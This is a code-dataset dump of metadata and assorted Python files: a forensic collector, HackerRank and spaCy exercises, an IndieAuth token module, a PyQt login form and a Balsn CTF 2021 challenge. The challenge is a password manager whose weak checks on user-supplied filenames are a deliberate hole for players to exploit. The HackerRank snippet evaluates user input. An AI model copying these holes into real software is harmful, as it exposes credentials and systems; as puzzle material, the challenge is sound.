hexsha
stringlengths
40
40
size
int64
6
782k
ext
stringclasses
7 values
lang
stringclasses
1 value
max_stars_repo_path
stringlengths
4
237
max_stars_repo_name
stringlengths
6
72
max_stars_repo_head_hexsha
stringlengths
40
40
max_stars_repo_licenses
list
max_stars_count
int64
1
53k
max_stars_repo_stars_event_min_datetime
stringlengths
24
24
max_stars_repo_stars_event_max_datetime
stringlengths
24
24
max_issues_repo_path
stringlengths
4
184
max_issues_repo_name
stringlengths
6
72
max_issues_repo_head_hexsha
stringlengths
40
40
max_issues_repo_licenses
list
max_issues_count
int64
1
27.1k
max_issues_repo_issues_event_min_datetime
stringlengths
24
24
max_issues_repo_issues_event_max_datetime
stringlengths
24
24
max_forks_repo_path
stringlengths
4
184
max_forks_repo_name
stringlengths
6
72
max_forks_repo_head_hexsha
stringlengths
40
40
max_forks_repo_licenses
list
max_forks_count
int64
1
12.2k
max_forks_repo_forks_event_min_datetime
stringlengths
24
24
max_forks_repo_forks_event_max_datetime
stringlengths
24
24
content
stringlengths
6
782k
avg_line_length
float64
2.75
664k
max_line_length
int64
5
782k
alphanum_fraction
float64
0
1
13868f879246c68859ec6c33940fb1a1f22bad69
3,395
py
Python
Fastir_Collector/fs/windowsVistaFiles.py
Unam3dd/Train-2018-2020
afb6ae70fe338cbe55a21b74648d91996b818fa2
[ "MIT" ]
4
2021-04-23T15:39:17.000Z
2021-12-27T22:53:24.000Z
Fastir_Collector/fs/windowsVistaFiles.py
Unam3dd/Train-2018-2020
afb6ae70fe338cbe55a21b74648d91996b818fa2
[ "MIT" ]
null
null
null
Fastir_Collector/fs/windowsVistaFiles.py
Unam3dd/Train-2018-2020
afb6ae70fe338cbe55a21b74648d91996b818fa2
[ "MIT" ]
2
2021-04-19T08:28:54.000Z
2022-01-19T13:23:29.000Z
# -*- coding: utf-8 -*- from __future__ import unicode_literals from fs import _FS class WindowsVistaFiles(_FS): def __init__(self, params): super(WindowsVistaFiles, self).__init__(params) self.userprofile = params['USERPROFILE'] def __list_named_pipes(self): return super(WindowsVistaFiles, self)._list_named_pipes() def _list_windows_prefetch(self): return super(WindowsVistaFiles, self)._list_windows_prefetch() def _chrome_history(self): return super(WindowsVistaFiles, self)._chrome_history( '\\Users\\*\\AppData\\Local\\Google\\Chrome\\User Data\\*\\History') def _firefox_history(self): return super(WindowsVistaFiles, self)._firefox_history( '\\Users\\*\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\places.sqlite') def csv_print_list_named_pipes(self): super(WindowsVistaFiles, self)._csv_list_named_pipes(self._list_named_pipes()) def csv_print_list_windows_prefetch(self): super(WindowsVistaFiles, self)._csv_windows_prefetch(self._list_windows_prefetch()) def csv_skype_history(self): super(WindowsVistaFiles, self)._skype_history(['AppData\\Roaming\\Skype']) def csv_ie_history(self): super(WindowsVistaFiles, self)._ie_history(['AppData\\Local\\Microsoft\\Windows\\*\\History.IE5', 'AppData\\Local\\Microsoft\\Windows\\*\\Low\\History.IE5']) def csv_firefox_history(self): super(WindowsVistaFiles, self)._csv_firefox_history(self._firefox_history()) def csv_chrome_history(self): super(WindowsVistaFiles, self)._csv_chrome_history(self._chrome_history()) def csv_firefox_downloads(self): super(WindowsVistaFiles, self)._firefox_downloads( ['AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\downloads.sqlite']) def csv_get_startup_files(self): super(WindowsVistaFiles, self)._csv_get_startup_files( self.userprofile + '\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*') def json_print_list_named_pipes(self): super(WindowsVistaFiles, self)._json_list_named_pipes(self._list_named_pipes()) def json_print_list_windows_prefetch(self): super(WindowsVistaFiles, self)._json_windows_prefetch(self._list_windows_prefetch()) def json_skype_history(self): super(WindowsVistaFiles, self)._skype_history(['AppData\\Roaming\\Skype']) def json_ie_history(self): super(WindowsVistaFiles, self)._ie_history(['AppData\\Local\\Microsoft\\Windows\\*\\History.IE5', 'AppData\\Local\\Microsoft\\Windows\\*\\Low\\History.IE5']) def json_firefox_history(self): super(WindowsVistaFiles, self)._json_firefox_history(self._firefox_history()) def json_chrome_history(self): super(WindowsVistaFiles, self)._json_chrome_history(self._chrome_history()) def json_firefox_downloads(self): super(WindowsVistaFiles, self)._firefox_downloads( ['AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\*.default\\downloads.sqlite']) def json_get_startup_files(self): super(WindowsVistaFiles, self)._json_get_startup_files( self.userprofile + '\\*\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*')
43.525641
111
0.697791
b9f599563bea1f46bb7c67209476021b9ef4c064
68
py
Python
Python/070-Input().py
sadikkuzu/HackerRank
2b1ed2cf41f6a5404c5b9293186f301b646b5d33
[ "Apache-2.0" ]
5
2019-03-09T22:44:01.000Z
2021-09-14T00:11:38.000Z
Python/070-Input().py
jguerra7/HackerRank-4
7e1663d0050ffbb0fd885b8affdada9ea13b0e80
[ "Apache-2.0" ]
4
2018-08-16T09:39:47.000Z
2018-09-14T17:37:07.000Z
Python/070-Input().py
jguerra7/HackerRank-4
7e1663d0050ffbb0fd885b8affdada9ea13b0e80
[ "Apache-2.0" ]
1
2020-06-01T23:38:35.000Z
2020-06-01T23:38:35.000Z
[x, y] = [int(c) for c in raw_input().split(' ')] print y == input()
34
49
0.544118
4c0967b1d662aca0bb4916d669b727edc68fb383
160
py
Python
exercises/ja/exc_01_07.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
2,085
2019-04-17T13:10:40.000Z
2022-03-30T21:51:46.000Z
exercises/ja/exc_01_07.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
79
2019-04-18T14:42:55.000Z
2022-03-07T08:15:43.000Z
exercises/ja/exc_01_07.py
Jette16/spacy-course
32df0c8f6192de6c9daba89740a28c0537e4d6a0
[ "MIT" ]
361
2019-04-17T13:34:32.000Z
2022-03-28T04:42:45.000Z
import spacy # 「ja_core_news_sm」モデルをロード nlp = ____ text = "公式発表:Appleが米国の上場企業として初めて時価評価額1兆ドルに到達しました。" # テキストを処理 doc = ____ # docのテキストをプリント print(____.____)
12.307692
50
0.76875
4c4e52e055f36405d43c1b30f4fe24587419d647
8,074
py
Python
publ/tokens.py
fluffy-critter/Publ
868c5a17c605707dde4d1a95d79405301bd12f05
[ "MIT" ]
6
2018-03-29T02:07:44.000Z
2018-09-26T00:17:31.000Z
publ/tokens.py
fluffy-critter/Publ
868c5a17c605707dde4d1a95d79405301bd12f05
[ "MIT" ]
82
2018-04-01T08:53:59.000Z
2018-09-28T23:45:05.000Z
publ/tokens.py
fluffy-critter/Publ
868c5a17c605707dde4d1a95d79405301bd12f05
[ "MIT" ]
null
null
null
""" IndieAuth token endpoint """ import functools import json import logging import time import typing import urllib.parse import arrow import flask import itsdangerous import requests import werkzeug.exceptions as http_error from pony import orm from . import model, utils from .config import config LOGGER = logging.getLogger(__name__) def signer(context: str): """ Gets the signer/validator for the tokens """ from .flask_wrapper import current_app return itsdangerous.URLSafeSerializer(str(current_app.secret_key) + context) def get_token(id_url: str, lifetime: int, scope: str = None, context: str = '') -> str: """ Gets a signed token for the given identity""" token = {'me': utils.canonicize_url(id_url)} if scope: token['scope'] = scope return signer(context).dumps((token, int(time.time() + lifetime))) def parse_token(token: str, context: str = '') -> typing.Dict[str, str]: """ Parse a bearer token to get the stored data """ try: ident, expires = signer(context).loads(token) except itsdangerous.BadData as error: LOGGER.error("Got token parse error: %s", error) flask.g.token_error = 'Invalid token' # pylint:disable=assigning-non-slot raise http_error.Unauthorized('Invalid token') from error if expires < time.time(): LOGGER.info("Got expired token for %s", ident['me']) flask.g.token_error = "Token expired" # pylint:disable=assigning-non-slot raise http_error.Unauthorized("Token expired") return ident def request(user): """ Called whenever an authenticated access fails; marks authentication as being upgradeable. Currently this is unused by Publ itself, but a site can make use of it to e.g. add a ``WWW-Authenticate`` header or the like in a post-request hook. """ if not user: flask.g.needs_auth = True # pylint:disable=assigning-non-slot def send_auth_ticket(subject: str, resource: str, endpoint: str, scope: str = None): """ Initiate the TicketAuth flow """ from .flask_wrapper import current_app def _submit(): ticket = get_token(subject, config.ticket_lifetime, scope, context='ticket') req = requests.post(endpoint, data={ 'ticket': ticket, 'resource': resource, 'subject': subject }) LOGGER.info("Auth ticket sent to %s for %s: %d %s", endpoint, subject, req.status_code, req.text) # Use the indexer's threadpool to issue the ticket in the background current_app.indexer.submit(_submit) @orm.db_session() def log_grant(identity: str): """ Update the user table with the granted token """ import authl.handlers.indieauth values = { 'last_token': arrow.utcnow().datetime, } profile = authl.handlers.indieauth.get_profile(identity) if profile: values['profile'] = profile record = model.KnownUser.get(user=identity) if record: record.set(**values) else: record = model.KnownUser(user=identity, **values, last_seen=arrow.utcnow().datetime) def redeem_grant(grant_type: str, auth_token: str): """ Redeem a grant from a provided redemption ticket """ grant = parse_token(auth_token, grant_type) LOGGER.info("Redeeming %s for %s; scopes=%s", grant_type, grant['me'], grant.get('scope')) scope = grant.get('scope', '') token = get_token(grant['me'], config.token_lifetime, scope) response = { 'access_token': token, 'token_type': 'Bearer', 'me': grant['me'], 'expires_in': config.token_lifetime, 'refresh_token': get_token(grant['me'], config.refresh_token_lifetime, scope, context='refresh_token') } if scope: response['scope'] = scope log_grant(grant['me']) return json.dumps(response), {'Content-Type': 'application/json'} @functools.lru_cache() def get_ticket_endpoint(me_url: str): """ Get the IndieAuth Ticket Auth endpoint and the canonical identity URL """ LOGGER.debug("get_ticket_endpoint %s", me_url) import authl.handlers.indieauth from bs4 import BeautifulSoup req = authl.utils.request_url(me_url) content = BeautifulSoup(req.text, 'html.parser') if req.links and 'canonical' in req.links: canonical_url = req.links['canonical']['url'] else: link = content.find('link', rel='canonical') if link: canonical_url = urllib.parse.urljoin(me_url, link.get('href')) else: canonical_url = me_url if utils.canonicize_url(canonical_url) != utils.canonicize_url(me_url): # We have a rel="canonical" which mismatches the provided identity URL LOGGER.debug("%s -> canonical=%s", me_url, canonical_url) endpoint, me_url = authl.handlers.indieauth.find_endpoint(canonical_url, rel='ticket_endpoint') else: # Use our fetch to seed Authl's endpoint fetch and get that instead endpoints, me_url = authl.handlers.indieauth.find_endpoints(me_url, req.links, content) endpoint = endpoints.get('ticket_endpoint') LOGGER.debug("%s %s", me_url, endpoint) return endpoint, me_url def ticket_request(me_url: str, scope: str): """ Initiate a ticket request """ try: endpoint, me_url = get_ticket_endpoint(utils.canonicize_url(me_url)) except RuntimeError: endpoint = None if not endpoint: raise http_error.BadRequest("Could not get ticket endpoint") LOGGER.info("endpoint: %s", endpoint) send_auth_ticket(me_url, flask.request.url_root, endpoint, scope) return "Ticket sent", 202 def parse_authorization_header(header): """ Parse an Authorization: header from an HTTP request into token """ parts = header.split() if len(parts) < 2: raise http_error.BadRequest("Malformed authorization header") if parts[0].lower() == 'bearer': token = parse_token(parts[1]) return token raise http_error.BadRequest(f"Unknown authorization type '{parts[0]}'") def indieauth_endpoint(): """ IndieAuth token endpoint """ if 'grant_type' in flask.request.form: # token grant if flask.request.form['grant_type'] == 'ticket': # TicketAuth if 'ticket' not in flask.request.form: raise http_error.BadRequest("Missing ticket") return redeem_grant('ticket', flask.request.form['ticket']) if flask.request.form['grant_type'] == 'refresh_token': # Refresh token redemption if 'refresh_token' not in flask.request.form: raise http_error.BadRequest("Missing refresh_token") return redeem_grant('refresh_token', flask.request.form['refresh_token']) raise http_error.BadRequest("Unknown grant type") if 'action' in flask.request.form: # provisional ticket request flow, per https://github.com/indieweb/indieauth/issues/87 if flask.request.form['action'] == 'ticket' and 'subject' in flask.request.form: return ticket_request(flask.request.form['subject'], flask.request.form.get('scope', '')) raise http_error.BadRequest() if 'Authorization' in flask.request.headers: # ticket verification token = parse_authorization_header(flask.request.headers['Authorization']) return json.dumps(token), {'Content-Type': 'application/json'} if 'me' in flask.request.args: # ad-hoc ticket request return ticket_request(flask.request.args['me'], flask.request.args.get('scope', '')) raise http_error.BadRequest()
33.92437
94
0.630419
4c69651efeb7fa6870e433061a12e8cdd6c2e2fc
608
py
Python
imgtl/const.py
reviforks/imgtl
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
[ "MIT" ]
null
null
null
imgtl/const.py
reviforks/imgtl
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
[ "MIT" ]
null
null
null
imgtl/const.py
reviforks/imgtl
b2141f9f0d7f2d318661f6ff6ab9594cff5b80f3
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf-8 -* from collections import OrderedDict BASE_URL = 'https://img.tl/%s' # SERVERS SERVERS = OrderedDict(( ('S1', 's1.img.tl'), ('S2', 's2.img.tl'), )) # OBJ_TYPE TYPE_IMAGE = 1 TYPE_FILE = 2 TYPE_TEXT = 3 # EXPIRE_BEHAVIOR EXPIRE_BEHAVIORS = ( 'delete', 'private', ) USER_DEFAULT_ICON = BASE_URL % 'img/user_icon.png' USERNAME_BLACKLIST = ['admin', 'root', 'mail', 'beta', 'test', 'static'] URL_BLACKLIST = ['login', 'signup', 'logout', 'upload', 'img', 'css', 'js', 'fonts'] AVAILABLE_FORMAT = ['JPEG', 'PNG', 'GIF', 'SVG'] ADMIN_IDS = (1, )
18.424242
84
0.616776
d5bdc8662b74e93d4537ef87964eb33ced8a8711
366
py
Python
python/en/archive/dropbox/ec2-oregon/lid_core.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
python/en/archive/dropbox/ec2-oregon/lid_core.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
python/en/archive/dropbox/ec2-oregon/lid_core.py
aimldl/coding
70ddbfaa454ab92fd072ee8dc614ecc330b34a70
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 """ lid_core.py """ # Custom package from utils import makedirs_if_absent from utils import save2wav def identify_language( device_id_, sampling_rate_, payload_ ): file = save2wav( device_id, SAMPLING_RATE, payload ) print('hello') # preprocess( payload, SAMPLING_RATE, WINDOW_LENGTH, WINDOW_STEP, NUM_FEATURES )
24.4
84
0.721311
e6a5be7ec77a57ca811ac7abe02cbab84ce3bf04
1,107
py
Python
python/oneflow/compatible/single_client/layers.py
wangyuyue/oneflow
0a71c22fe8355392acc8dc0e301589faee4c4832
[ "Apache-2.0" ]
3,285
2020-07-31T05:51:22.000Z
2022-03-31T15:20:16.000Z
python/oneflow/compatible/single_client/layers.py
wangyuyue/oneflow
0a71c22fe8355392acc8dc0e301589faee4c4832
[ "Apache-2.0" ]
2,417
2020-07-31T06:28:58.000Z
2022-03-31T23:04:14.000Z
python/oneflow/compatible/single_client/layers.py
wangyuyue/oneflow
0a71c22fe8355392acc8dc0e301589faee4c4832
[ "Apache-2.0" ]
520
2020-07-31T05:52:42.000Z
2022-03-29T02:38:11.000Z
""" Copyright 2020 The OneFlow Authors. All rights reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from oneflow.compatible.single_client.ops.categorical_ordinal_encode_op import ( categorical_ordinal_encoder, ) from oneflow.compatible.single_client.ops.layers import ( batch_normalization, batch_normalization_add_relu, batch_normalization_relu, conv1d, conv2d, conv3d, dense, layer_norm, layer_norm_grad, layer_norm_param_grad, ) from oneflow.compatible.single_client.ops.layers import upsample as upsample_2d from oneflow.compatible.single_client.ops.prelu import prelu
33.545455
80
0.789521
e6fadb87ec4f2e48c3ab3d2f8ece993d29a2ec51
327
py
Python
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
null
null
null
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
null
null
null
Python/M01_ProgrammingBasics/L01_FirstStepsInCoding/Exercises/Solutions/P08_FishTank.py
todorkrastev/softuni-software-engineering
cfc0b5eaeb82951ff4d4668332ec3a31c59a5f84
[ "MIT" ]
1
2022-02-23T13:03:14.000Z
2022-02-23T13:03:14.000Z
length = int(input()) width = int(input()) height = int(input()) occupied = float(input()) occupied_percent = occupied / 100 full_capacity = length * width * height occupied_total = occupied_percent * full_capacity remaining = full_capacity - occupied_total capacity_in_dm = remaining / 1000 water = capacity_in_dm print(water)
29.727273
49
0.767584
075a93632cbfe8a22160427cf0df0508357d9411
6,288
py
Python
Admin/res/signIn.py
BlaCkinkGJ/SFSH
0134f1e4698ef34caee2d5a8cd875c51507b3527
[ "MIT" ]
1
2019-02-28T08:39:55.000Z
2019-02-28T08:39:55.000Z
Admin/res/signIn.py
BlaCkinkGJ/SFSH
0134f1e4698ef34caee2d5a8cd875c51507b3527
[ "MIT" ]
5
2018-07-17T13:09:34.000Z
2018-09-11T13:55:33.000Z
Admin/res/signIn.py
BlaCkinkGJ/SFSH
0134f1e4698ef34caee2d5a8cd875c51507b3527
[ "MIT" ]
2
2019-05-17T03:07:08.000Z
2022-01-01T07:04:31.000Z
# -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'signIn.ui' # # Created by: PyQt5 UI code generator 5.9.2 # # WARNING! All changes made in this file will be lost! from PyQt5 import QtCore, QtGui, QtWidgets from res import signUp, status import pipeline as pipe from PyQt5.QtWidgets import QMessageBox as msgbox class Ui_Form(object): def setupUi(self, Form): pipe.db.changeCollection(pipe.info['loginDB']) Form.setObjectName("Form") Form.resize(338, 277) sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(Form.sizePolicy().hasHeightForWidth()) Form.setSizePolicy(sizePolicy) self.frame_8 = QtWidgets.QFrame(Form) self.frame_8.setGeometry(QtCore.QRect(10, 10, 321, 261)) self.frame_8.setFrameShape(QtWidgets.QFrame.NoFrame) self.frame_8.setFrameShadow(QtWidgets.QFrame.Plain) self.frame_8.setLineWidth(19) self.frame_8.setMidLineWidth(0) self.frame_8.setObjectName("frame_8") self.MainLabel = QtWidgets.QLabel(self.frame_8) self.MainLabel.setGeometry(QtCore.QRect(30, 10, 261, 51)) font = QtGui.QFont() font.setFamily("나눔스퀘어라운드 ExtraBold") font.setPointSize(16) font.setBold(True) font.setWeight(75) self.MainLabel.setFont(font) self.MainLabel.setTextFormat(QtCore.Qt.PlainText) self.MainLabel.setAlignment(QtCore.Qt.AlignCenter) self.MainLabel.setObjectName("MainLabel") self.LogInBox = QtWidgets.QGroupBox(self.frame_8) self.LogInBox.setGeometry(QtCore.QRect(10, 70, 301, 181)) font = QtGui.QFont() font.setFamily("나눔스퀘어 Bold") font.setBold(True) font.setWeight(75) self.LogInBox.setFont(font) self.LogInBox.setObjectName("LogInBox") self.layoutWidget_2 = QtWidgets.QWidget(self.LogInBox) self.layoutWidget_2.setGeometry(QtCore.QRect(50, 120, 202, 34)) self.layoutWidget_2.setObjectName("layoutWidget_2") self.Button = QtWidgets.QHBoxLayout(self.layoutWidget_2) self.Button.setContentsMargins(0, 0, 0, 0) self.Button.setObjectName("Button") self.SignIn = QtWidgets.QPushButton(self.layoutWidget_2) font = QtGui.QFont() font.setFamily("나눔스퀘어 Bold") font.setPointSize(10) font.setBold(False) font.setWeight(50) self.SignIn.setFont(font) self.SignIn.setObjectName("SignIn") self.Button.addWidget(self.SignIn) spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum) self.Button.addItem(spacerItem) self.SignUp = QtWidgets.QPushButton(self.layoutWidget_2) font = QtGui.QFont() font.setFamily("나눔스퀘어 Bold") font.setPointSize(10) font.setBold(False) font.setWeight(50) self.SignUp.setFont(font) self.SignUp.setObjectName("SignUp") self.Button.addWidget(self.SignUp) self.Password = QtWidgets.QLabel(self.LogInBox) self.Password.setGeometry(QtCore.QRect(30, 80, 81, 16)) font = QtGui.QFont() font.setFamily("나눔스퀘어 Bold") font.setPointSize(10) font.setBold(False) font.setWeight(50) self.Password.setFont(font) self.Password.setObjectName("Password") self.PasswordText = QtWidgets.QLineEdit(self.LogInBox) self.PasswordText.setGeometry(QtCore.QRect(140, 80, 113, 21)) self.PasswordText.setObjectName("PasswordText") self.PasswordText.setEchoMode(QtWidgets.QLineEdit.Password) self.UsernameText = QtWidgets.QLineEdit(self.LogInBox) self.UsernameText.setGeometry(QtCore.QRect(140, 40, 113, 21)) self.UsernameText.setObjectName("UsernameText") self.Username = QtWidgets.QLabel(self.LogInBox) self.Username.setGeometry(QtCore.QRect(30, 40, 81, 16)) font = QtGui.QFont() font.setFamily("나눔스퀘어 Bold") font.setPointSize(10) font.setBold(False) font.setWeight(50) self.Username.setFont(font) self.Username.setObjectName("Username") self.retranslateUi(Form) QtCore.QMetaObject.connectSlotsByName(Form) Form.setTabOrder(self.UsernameText, self.PasswordText) Form.setTabOrder(self.PasswordText, self.SignIn) Form.setTabOrder(self.SignIn, self.SignUp) self.SignIn.clicked.connect(self.signInButton) self.SignUp.clicked.connect(self.signUpButton) def retranslateUi(self, Form): _translate = QtCore.QCoreApplication.translate Form.setWindowTitle(_translate("Form", "작업자 통합 관리 시스템")) self.MainLabel.setText(_translate("Form", "작업자 통합 관리시스템")) self.LogInBox.setTitle(_translate("Form", "Log-in")) self.SignIn.setText(_translate("Form", "Sign In")) self.SignUp.setText(_translate("Form", "Sign Up")) self.Password.setText(_translate("Form", "Password")) self.Username.setText(_translate("Form", "Username")) def signInButton(self): import hashlib username = self.UsernameText.text() password = self.PasswordText.text() password = hashlib.sha256(password.encode()).hexdigest() isExist = pipe.db.collection.find_one({'username': username, 'password': password}) is not None if isExist: temp = pipe.window pipe.window = QtWidgets.QWidget() pipe.ui = status.Ui_Form() pipe.ui.setupUi(pipe.window) pipe.window.show() temp.close() else: msgbox.question(pipe.window, '로그인 실패', '계정을 찾을 수 없습니다.', msgbox.Yes, msgbox.Yes) def signUpButton(self): temp = pipe.window pipe.window = QtWidgets.QWidget() pipe.ui = signUp.Ui_Form() pipe.ui.setupUi(pipe.window) pipe.window.show() temp.close() if __name__ == "__main__": import sys app = QtWidgets.QApplication(sys.argv) Form = QtWidgets.QWidget() ui = Ui_Form() ui.setupUi(Form) Form.show() sys.exit(app.exec_())
39.797468
114
0.661737
4aeff121214dfee78d86d9c96293458a719dadb5
957
py
Python
skripte/interface.py
Ilaris-Tools/IlarisDB
9608afa0ebc69c2bbc13af939cb2c71321f5da37
[ "MIT" ]
null
null
null
skripte/interface.py
Ilaris-Tools/IlarisDB
9608afa0ebc69c2bbc13af939cb2c71321f5da37
[ "MIT" ]
4
2022-03-13T22:56:35.000Z
2022-03-16T11:33:27.000Z
skripte/interface.py
Ilaris-dev/IlarisDB
9608afa0ebc69c2bbc13af939cb2c71321f5da37
[ "MIT" ]
null
null
null
import yaml import yamale class NoAliasDumper(yaml.SafeDumper): def ignore_aliases(self, data): return True def load(table): with open(f"../daten/{table}.yml", "r") as table_file: table_data = yaml.load(table_file) return table_data def validate(table, data=None, schemaf=None): if schemaf: schema = yamale.make_schema(f'../schemata/{schemaf}.yml') else: schema = yamale.make_schema(f'../schemata/{table}.yml') if data is None: data = yamale.make_data(f'../daten/{table}.yml') yamale.validate(schema, data, strict=True) print("\nYaY! Datei ist ok :)") return True def save(table, data, validate=False): if validate: validate(table, data) dump = yaml.dump(data, default_flow_style=False, allow_unicode=True, Dumper=NoAliasDumper) with open(f"../daten/{table}.yml", "w", encoding='utf8') as table_file: table_file.write(dump)
27.342857
75
0.642633
91ab5c73aaba0afcc0b14306a9cc3bed5d7b43e5
623
py
Python
musterloesungen/4.4/hypotenuse.py
giu/appe6-uzh-hs2018
204dea36be1e53594124b606cdfa044368e54726
[ "MIT" ]
null
null
null
musterloesungen/4.4/hypotenuse.py
giu/appe6-uzh-hs2018
204dea36be1e53594124b606cdfa044368e54726
[ "MIT" ]
null
null
null
musterloesungen/4.4/hypotenuse.py
giu/appe6-uzh-hs2018
204dea36be1e53594124b606cdfa044368e54726
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- # Kurs: Python: Grundlagen der Programmierung für Nicht-Informatiker # Semester: Herbstsemester 2018 # Homepage: http://accaputo.ch/kurs/python-uzh-hs-2018/ # Author: Giuseppe Accaputo # Aufgabe: 4.4 import math def hypotenuse(a,b): if a < 0 or b < 0: return summe_quadrat = a**2 + b**2 c = math.sqrt(summe_quadrat) return c print(hypotenuse(0,0)) print(hypotenuse(3,4)) hypotenuse_mit_negativer_seitenlaenge = hypotenuse(-1,2) if hypotenuse_mit_negativer_seitenlaenge == None: print("Fehler: Eine negative Seitenlänge wurde angegeben")
24.92
76
0.680578
72a6db606e9525b89423c77424977159dbbc1bed
27
py
Python
my-cs/intern/java_details/java_sort_selection_details/__init__.py
zaqwes8811/cs-courses
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
[ "Apache-2.0" ]
null
null
null
my-cs/intern/java_details/java_sort_selection_details/__init__.py
zaqwes8811/cs-courses
aa9cf5ad109c9cfcacaadc11bf2defb2188ddce2
[ "Apache-2.0" ]
15
2015-03-07T12:46:41.000Z
2015-04-11T09:08:36.000Z
buffer/scripts-emb-ext/projects/v8-wrap-gen/sources/v8_api_gen_r16258/matrix.py
zaqwes8811/micro-apps
7f63fdf613eff5d441a3c2c7b52d2a3d02d9736a
[ "MIT" ]
null
null
null
__author__ = 'zaqwes_user'
13.5
26
0.777778
a3e009ccf40de5e9b3b42baa9e366d10feb5593c
5,956
py
Python
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
Jimmy01240397/balsn-2021-writeup
91b71dfbddc1c214552280b12979a82ee1c3cb7e
[ "MIT" ]
null
null
null
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
Jimmy01240397/balsn-2021-writeup
91b71dfbddc1c214552280b12979a82ee1c3cb7e
[ "MIT" ]
null
null
null
balsn-2021-writeup/alldata/misc/darkknight/challenge.py
Jimmy01240397/balsn-2021-writeup
91b71dfbddc1c214552280b12979a82ee1c3cb7e
[ "MIT" ]
null
null
null
import os import shutil base_dir = f"C:\\Users\\balsnctf\\Documents\\Dark Knight\\tmp-{os.urandom(16).hex()}" def init(): os.mkdir(base_dir) os.chdir(base_dir) with open("39671", "w") as f: f.write("alice\nalice1025") with open("683077", "w") as f: f.write("bob\nbob0105a") def password_manager(): print("use a short pin code to achieve fast login!!") while True: pin = input("enter a pin code > ") if len(pin) > 100: print("too long...") continue if "\\" in pin or "/" in pin or ".." in pin or "*" in pin: print("what do you want to do?(¬_¬)") continue flag = True for c in pin.encode("utf8"): if c > 0x7e or c < 0x20: print("printable chars only!!") flag = False break if flag: break while True: username = input("enter username > ") if len(username) > 100: print("too long...") continue for c in username.encode("utf8"): if c > 0x7e or c < 0x20: print("printable chars only!!") flag = False break if flag: break while True: password = input("enter password > ") if len(password) > 100: print("too long...") continue for c in password.encode("utf8"): if c > 0x7e or c < 0x20: print("printable chars only!!") flag = False break if flag: break try: with open(pin, "w") as f: f.write(username + "\n" + password) print("saved!!") except OSError: print("pin is invalid!!") def safety_guard(): print("safety guard activated. will delete all unsafe credentials hahaha...") delete_file = [] for pin in os.listdir("."): safe = True with open(pin, "r") as f: data = f.read().split("\n") if len(data) != 2: safe = False elif len(data[0]) == 0 or len(data[1]) == 0: safe = False elif data[0].isalnum() == False or data[1].isalnum() == False: safe = False elif data[0] == "admin": safe = False if safe == False: os.remove(pin) delete_file.append(pin) print(f"finished. delete {len(delete_file)} unsafe credentials: {delete_file}") def fast_login(): while True: pin = input("enter a pin code > ") if len(pin) > 100: print("too long...") continue if "\\" in pin or "/" in pin or ".." in pin: print("what do you want to do?(¬_¬)") continue flag = True for c in pin.encode("utf8"): if c > 0x7e or c < 0x20: print("printable chars only!!") flag = False break if flag: break try: with open(pin, "r") as f: data = f.read().split("\n") if len(data) != 2: print("unknown error happened??") return None, None return data[0], data[1] except FileNotFoundError: print("this pin code is not registered.") return None, None def normal_login(): while True: username = input("enter username > ") if len(username) > 100: print("too long...") elif username.isalnum() == False: print("strange username, huh?") elif username == "admin": print("no you are definitely not (╬ Ò ‸ Ó)") else: break while True: password = input("enter password > ") if len(password) > 100: print("too long...") continue elif password.isalnum() == False: print("strange password, huh?") else: break return username, password def login(): safety_guard() while True: print("1. fast login") print("2. normal login") print("3. exit") x = input("enter login type > ") if x == "1": username, password = fast_login() elif x == "2": username, password = normal_login() elif x == "3": print("bye-bye~") return else: print("invalid input.") continue if username != None and password != None: print(f"hello, {username}.") if username == "admin": while True: x = input("do you want the flag? (y/n): ") if x == "n": print("OK, bye~") return elif x == "y": break else: print("invalid input.") while True: x = input("beg me: ") if x == "plz": print("ok, here is your flag: BALSN{flag is here ...}") break return def main(): init() try: while True: print("1. passord manager") print("2. login") print("3. exit") x = input("what do you want to do? > ") if x == "1": password_manager() elif x == "2": login() elif x == "3": print("bye-bye~") break else: print(f"invalid input: {x}") except KeyboardInterrupt: print("bye-bye~") except: print("unexpected error occured.") os.chdir("../") shutil.rmtree(base_dir) if __name__ == "__main__": main()
26.70852
85
0.442915
60c0cd827415a46d31c66b3462e5fe5c9ac90ec0
9,435
py
Python
